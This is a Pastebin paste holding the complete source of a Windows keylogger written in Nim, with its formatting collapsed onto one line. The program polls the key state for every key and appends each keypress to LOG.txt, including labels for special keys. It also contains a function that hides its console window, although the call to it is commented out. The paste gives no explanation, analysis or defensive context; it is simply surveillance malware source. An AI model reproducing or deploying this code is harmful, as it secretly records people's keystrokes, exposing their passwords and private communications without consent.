# Pastebin 4G6fE1W3 import os import windows proc GetAsyncKeyState(key: cint): int {.header: "", varargs.} proc Stealth() = var Stealth: HWND discard AllocConsole() Stealth = FindWindowA("ConsoleWindowClass", nil); discard ShowWindow(Stealth,0) proc main() = #Stealth() var file = open("LOG.txt", fmAppend) while true: for i in 8..190: if GetAsyncKeyState(cint(i)) == -32767: case i of 32: write(file, " ") of 8: write(file, "[BACKSPACE]") of 13: write(file, "\n") of VK_TAB: write(file, "[TAB]") of VK_SHIFT: write(file, "[SHIFT]") of VK_CONTROL: write(file, "[CTRL]") of VK_ESCAPE: write(file, "[ESC]") of VK_END: write(file, "[END]") of VK_HOME: write(file, "[HOME]") of VK_LEFT: write(file, "[LEFT]") of VK_UP: write(file, "[UP]") of VK_RIGHT: write(file, "[RIGHT]") of VK_DOWN: write(file, "[DOWN]") of 190, 110: write(file, ".") else: write(file, $chr(i)) flushFile(file) discard execShellCmd("PAUSE") main()